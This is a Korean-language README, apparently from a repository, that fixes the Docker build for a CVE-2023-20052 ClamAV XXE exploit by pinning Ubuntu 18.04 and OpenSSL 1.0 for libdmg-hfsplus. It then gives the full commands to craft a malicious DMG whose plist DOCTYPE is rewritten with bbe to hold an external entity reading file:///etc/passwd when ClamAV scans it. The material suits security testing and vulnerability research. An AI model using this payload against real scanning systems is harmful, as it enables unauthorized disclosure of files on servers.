
CVE-2023-20052 ClamAV XXE 익스플로잇용 Docker 빌드 수정. libdmg-hfsplus 호환성을 위해 Ubuntu 18.04 및 OpenSSL 1.0을 사용하여 OpenSSL 3.0 컴파일 오류 해결. XML 외부 엔티티 주입을 위한 악성 DMG 파일 생성.
실제로 컴파일되는 CVE-2023-20052 (ClamAV XXE 취약점)에 대한 수정된 Docker 빌드
원본 익스플로잇이 최신 시스템에서 빌드되지 않음:
HMAC_CTX 구조체 불완전 타입 오류dmg/filevault.c 컴파일에서 빌드 실패libssl1.0-dev (OpenSSL 1.0) 사용libdmg-hfsplus는 더 이상 사용되지 않는 OpenSSL 1.0 함수들을 사용합니다:
HMAC_CTX_init() / (OpenSSL 1.1+에서 제거됨)HMAC_CTX_cleanup()HMAC_CTX 구조체 사용 (OpenSSL 1.1+에서 불투명함)Ubuntu 18.04는 OpenSSL 1.0을 지원하는 마지막 LTS입니다.
# Build (takes ~3-5 minutes)
docker build -t cve-2023-20052 .
# Run
docker run -v $(pwd):/exploit -it cve-2023-20052 bash
# Create exploit DMG
genisoimage -D -V "exploit" -no-pad -r -apple -o test.img .
dmg dmg test.img test.dmg
bbe -e 's|<!DOCTYPE plist PUBLIC "-//Apple Computer//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">|<!DOCTYPE plist [<!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>|' -e 's/blkx/&xxe;/' test.dmg -o exploit.dmg
## Fixed Docker build for CVE-2023-20052 (ClamAV XXE) - Resolves OpenSSL 3.0 compilation errors. Uses Ubuntu 18.04 with OpenSSL 1.0 for compatibility with libdmg-hfsplus